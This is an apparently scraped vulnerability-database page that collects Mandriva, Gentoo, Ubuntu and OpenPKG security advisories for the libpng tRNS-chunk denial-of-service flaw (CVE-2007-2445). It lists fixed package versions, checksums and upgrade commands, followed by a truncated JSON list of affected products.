Mandriva Linux 2007.0/X86_64: 80168137deb6e23d5a2fb6e8f3abc2ef 2007.0/x86_64/lib64png3-1.2.12-2.3mdv2007.0.x86_64.rpm b45baf5195b6ffd1d32b5829ff861b50 2007.0/x86_64/lib64png3-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 9e4f1d18db609adc5c2f92629814e360 2007.0/x86_64/lib64png3-static-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm

Mandriva Linux 2007.1: 300ed9a63f60a1ee16ce4e5caa71f96b 2007.1/i586/libpng3-1.2.13-2.1mdv2007.1.i586.rpm fdd3c3cefc587622382d37cd5fe2795e 2007.1/i586/libpng3-devel-1.2.13-2.1mdv2007.1.i586.rpm d6b13aa08877aec2aaf165203d2a6817 2007.1/i586/libpng3-static-devel-1.2.13-2.1mdv2007.1.i586.rpm 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm

Mandriva Linux 2007.1/X86_64: f1289336b45eb58bc2975011086fbfa9 2007.1/x86_64/lib64png3-1.2.13-2.1mdv2007.1.x86_64.rpm 8dc0504ac8c6ed8e6c5f641c738df144 2007.1/x86_64/lib64png3-devel-1.2.13-2.1mdv2007.1.x86_64.rpm d0b9f63131ecbfe01db295d15903fd40 2007.1/x86_64/lib64png3-static-devel-1.2.13-2.1mdv2007.1.x86_64.rpm 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm

Corporate 3.0: 9c0077ae596e6a2340ed6e08ab6c437c corporate/3.0/i586/libpng3-1.2.5-10.8.C30mdk.i586.rpm 2f44c9f5639aff57948b64cf845efa39 corporate/3.0/i586/libpng3-devel-1.2.5-10.8.C30mdk.i586.rpm e1638f0497b35341796bb74ccb5a95e7 corporate/3.0/i586/libpng3-static-devel-1.2.5-10.8.C30mdk.i586.rpm 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm

Corporate 3.0/X86_64: 632b1254a5b2ee4def5ac2f98bc7bd4c corporate/3.0/x86_64/lib64png3-1.2.5-10.8.C30mdk.x86_64.rpm b4ad3f3a34be89a22c7bdfcb8b9f351d corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.8.C30mdk.x86_64.rpm 419f3faddaeb3cbfa3ca020630858682 corporate/3.0/x86_64/lib64png3-static-devel-1.2.5-10.8.C30mdk.x86_64.rpm 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm

Corporate 4.0: a444aa0f9b3c0e5bac0562b3274806a5 corporate/4.0/i586/libpng3-1.2.8-1.3.20060mlcs4.i586.rpm 25542984f9b920e9ab9197d383c201b9 corporate/4.0/i586/libpng3-devel-1.2.8-1.3.20060mlcs4.i586.rpm a0c238ea1c16f892b704b5055fcc340d corporate/4.0/i586/libpng3-static-devel-1.2.8-1.3.20060mlcs4.i586.rpm 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm

Corporate 4.0/X86_64: 2ff58096a6a2961e15719aa35107fda6 corporate/4.0/x86_64/lib64png3-1.2.8-1.3.20060mlcs4.x86_64.rpm 78ecdacb1033eecfbf48e464d3106bb1 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 85ee7effc74676da27c1c2c1219b97a7 corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm

Multi Network Firewall 2.0: ea358d9ef4e412851f89abac96d015b7 mnf/2.0/i586/libpng3-1.2.5-10.8.M20mdk.i586.rpm 3068b2316e8225377b88dcaedbadb878 mnf/2.0/SRPMS/libpng-1.2.5-10.8.M20mdk.src.rpm


To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com


Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGZcKYmqjQ0CJFipgRAiL/AKDsmAXcJqycmwk5iMfPgWrV8Rl98gCgoeUN fefbLet+er8fbszmcgzIKUo= =rUB+ -----END PGP SIGNATURE-----

. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-11


                                        http://security.gentoo.org/

Severity: Normal Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities Date: December 12, 2014 Bugs: #196865, #335508, #483632, #508322 ID: 201412-11


Synopsis

Multiple vulnerabilities have been found in AMD64 x86 emulation base libraries, the worst of which may allow remote execution of arbitrary code.

Background

AMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 app-emulation/emul-linux-x86-baselibs < 20140406-r1 >= 20140406-r1

Description

Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details.

Workaround

There is no known workaround at this time.

Resolution

All users of the AMD64 x86 emulation base libraries should upgrade to the latest version:

# emerge --sync # emerge -1av ">=app-emulation/emul-linux-x86-baselibs-20140406-r1"

NOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them.

References

[ 1 ] CVE-2007-0720 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720 [ 2 ] CVE-2007-1536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536 [ 3 ] CVE-2007-2026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026 [ 4 ] CVE-2007-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445 [ 5 ] CVE-2007-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741 [ 6 ] CVE-2007-3108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108 [ 7 ] CVE-2007-4995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995 [ 8 ] CVE-2007-5116 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116 [ 9 ] CVE-2007-5135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135 [ 10 ] CVE-2007-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266 [ 11 ] CVE-2007-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268 [ 12 ] CVE-2007-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269 [ 13 ] CVE-2007-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849 [ 14 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 15 ] CVE-2013-0338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338 [ 16 ] CVE-2013-0339 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339 [ 17 ] CVE-2013-1664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664 [ 18 ] CVE-2013-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969 [ 19 ] CVE-2013-2877 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877 [ 20 ] CVE-2014-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201412-11.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-472-1 June 11, 2007 libpng vulnerability CVE-2007-2445 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.2

Ubuntu 6.10: libpng12-0 1.2.8rel-5.1ubuntu0.2

Ubuntu 7.04: libpng12-0 1.2.15~beta5-1ubuntu1

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

Details follow:

It was discovered that libpng did not correctly handle corrupted CRC in grayscale PNG images.

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz
  Size/MD5:    16483 713a6e035fa256e4cb822fb5fc88769b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc
  Size/MD5:      652 bc4f3f785816684c54d62947d53bc0db
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
  Size/MD5:   510681 cac1512878fb98f2456df6dc50bc9bc7

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb
  Size/MD5:      846 76eab5d9a96efa186d66cf299a4f6032

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb
  Size/MD5:    69484 078e25586525c4e83abf08c736fa6bd8
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb
  Size/MD5:   113888 46fce5d27ac4b2dea9cf4deb633f824e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb
  Size/MD5:   247528 68879285068cda170eef5a5f56594a1c

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb
  Size/MD5:    66932 12cafbea44a3e7cf109eb24cb47aa557
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb
  Size/MD5:   111396 3a93335c2a072b2e2c94bc2cc0b3d77e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb
  Size/MD5:   239662 64029c30dac5152c97e1a0d864c981d0

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb
  Size/MD5:    66304 0cbf98391b6c3219f83cd24cefe0343c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb
  Size/MD5:   110828 62c7a8ccc58c86414bcd170c394f8240
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb
  Size/MD5:   245220 1171c8638ec8ebc2c81f53706885b692

sparc architecture (Sun SPARC/UltraSPARC)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb
  Size/MD5:    63824 e66313895e489a36c2f438343fa3e0d4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb
  Size/MD5:   108534 73ccb876f761c76b3518b8ca81e80485
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb
  Size/MD5:   240048 5b19c41bbc639ee717fdacd4d81533e1

Updated packages for Ubuntu 6.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz
  Size/MD5:    16597 4ff19b636ab120a3fc4cee767171aa4f
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc
  Size/MD5:      659 5769690df3c57a56d08aa8bf11013a42
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
  Size/MD5:   510681 cac1512878fb98f2456df6dc50bc9bc7

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb
  Size/MD5:      888 44f3267b52e89fc605f350b4fc347e45

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb
  Size/MD5:    68992 105702504b783f464dff9ddd48de5ab0
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb
  Size/MD5:   113542 876f5c1a3a1f6b4bf828edcbabe0702e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb
  Size/MD5:   247132 75d920fe60a5d4f356ccb43d8d5a98ed

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb
  Size/MD5:    69932 53783b0d13fd194f8cc9f19e1edc63d7
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb
  Size/MD5:   114634 1b40abad309e133326ffdce859734610
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb
  Size/MD5:   242882 3dca0a0938a43308465c8987f1357160

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb
  Size/MD5:    67606 088844733b580984e1a3b79001a27511
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb
  Size/MD5:   112228 6024c0c9d455cfdaa8a38e89d6a53148
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb
  Size/MD5:   246684 e45d2830ca5bdf0747ea0d436fafc20e

sparc architecture (Sun SPARC/UltraSPARC)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb
  Size/MD5:    64656 55d6e7740ec8a9eddcbbfdada56a5f63
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb
  Size/MD5:   109396 0b522137b1f4b2a34f990efc9dbd81df
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb
  Size/MD5:   241064 e679e908623c68c5865fbf2c24c46973

Updated packages for Ubuntu 7.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz
  Size/MD5:    14344 16526f313e1ee650074edd742304ec53
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc
  Size/MD5:      819 b28af76731dfe368e48dfcd554d7b583
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
  Size/MD5:   829038 77ca14fcee1f1f4daaaa28123bd0b22d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb
  Size/MD5:      936 dcec28b3cf4b8ee22c6a1229fdbd2e84

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb
  Size/MD5:    70656 b4fa5b37b54fee32dd7404c64b696192
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb
  Size/MD5:   189594 7e36d8e73bd47dbb19afd7cd0099335a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb
  Size/MD5:   179950 c575d8c9699c971ec7682e52e37590b7

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb
  Size/MD5:    68246 c81ffc4cd0359a1ce1e73eb99d8608f6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb
  Size/MD5:   187234 09dcea1e3394a6d25565b23774d805db
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb
  Size/MD5:   171520 ac3fb45b36ec32b1bac4734eef162c49

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb
  Size/MD5:    70652 147c89e36570990d5e084fc3a8933ed2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb
  Size/MD5:   189548 00b81b16632e789ab20bab04dbcd586c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb
  Size/MD5:   179128 61c51aafc326420b202c0f2ce6d5abfd

sparc architecture (Sun SPARC/UltraSPARC)

http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb
  Size/MD5:    66396 faff3d313cdc64f273eda1a5d01c2e0a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb
  Size/MD5:   185312 249165d75936ab8cfc2fa1aef68a5ee6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb
  Size/MD5:   173800 a40164cd4995c6ed795219157e6d598e

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/

Advisory Id (public): OpenPKG-SA-2007.013 Advisory Type: OpenPKG Security Advisory (SA) Advisory Directory: http://openpkg.com/go/OpenPKG-SA Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.013 Advisory Published: 2007-05-17 22:31 UTC

Issue Id (internal): OpenPKG-SI-20070517.02 Issue First Created: 2007-05-17 Issue Last Modified: 2007-05-17 Issue Revision: 03


Subject Name: png Subject Summary: Portable Network Graphics (PNG) Image Format Library Subject Home: http://www.libpng.org/pub/png/libpng.html Subject Versions: * <= 1.2.16

Vulnerability Id: CVE-2007-2445 Vulnerability Scope: global (not OpenPKG specific)

Attack Feasibility: run-time Attack Vector: remote network Attack Impact: denial of service

Description: As confirmed by the vendor, a Denial of Service (DoS) vulnerability exists in the PNG [0] image format library libpng [1]. The bug is a NULL-pointer-dereference vulnerability involving palette images with a malformed "tRNS" PNG chunk, i.e., one with a bad CRC value. This bug can, at a minimum, cause crashes in applications simply by displaying a malformed image.

References: [0] http://www.libpng.org/pub/png/ [1] http://www.libpng.org/pub/png/libpng.html [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445


Primary Package Name: png Primary Package Home: http://openpkg.org/go/package/png

Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLID ghostscript-8.54-E1.0.1 OpenPKG Enterprise E1.0-SOLID png-1.2.12-E1.0.2 OpenPKG Community CURRENT ghostscript-8.57-20070516 OpenPKG Community CURRENT png-1.2.18-20070516


For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0670",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "libpng",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "png reference library",
        "version": "1.0.15"
      },
      {
        "model": "libpng",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "png reference library",
        "version": "1.2.16"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "gentoo linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "mandriva",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "libpng",
        "version": null
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "png group",
        "version": "0.90 to  1.0.24 up to version"
      },
      {
        "model": "libpng",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "png group",
        "version": "1.2.0 to  1.2.16 up to version"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.5.2"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "v10.5.2"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0 (x86-64)"
      },
      {
        "model": "java desktop system",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "release 2 (solaris 9 x86 for )"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "10 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "10 (x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (x86)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "9 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "9 (x86)"
      },
      {
        "model": "turbolinux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10_f"
      },
      {
        "model": "turbolinux appliance server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "1.0 (hosting)"
      },
      {
        "model": "turbolinux appliance server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "1.0 (workgroup)"
      },
      {
        "model": "turbolinux appliance server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "2.0"
      },
      {
        "model": "turbolinux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10"
      },
      {
        "model": "turbolinux fuji",
        "scope": null,
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": null
      },
      {
        "model": "turbolinux multimedia",
        "scope": null,
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": null
      },
      {
        "model": "turbolinux personal",
        "scope": null,
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": null
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10 (x64)"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "wizpy",
        "scope": null,
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": null
      },
      {
        "model": "home",
        "scope": null,
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": null
      },
      {
        "model": "imagekit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "newton",
        "version": "5"
      },
      {
        "model": "imagekit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "newton",
        "version": "6"
      },
      {
        "model": "imagekit",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "newton",
        "version": "6 ( english edition ) fixno.43"
      },
      {
        "model": "imagekit",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "newton",
        "version": "6 lite ( english edition ) fixno.30"
      },
      {
        "model": "imagekit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "newton",
        "version": "6 vcl"
      },
      {
        "model": "imagekit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "newton",
        "version": "7 activex"
      },
      {
        "model": "imagekit",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "newton",
        "version": "7 activex ( english edition ) fixno.1"
      },
      {
        "model": "postkit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "newton",
        "version": "2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
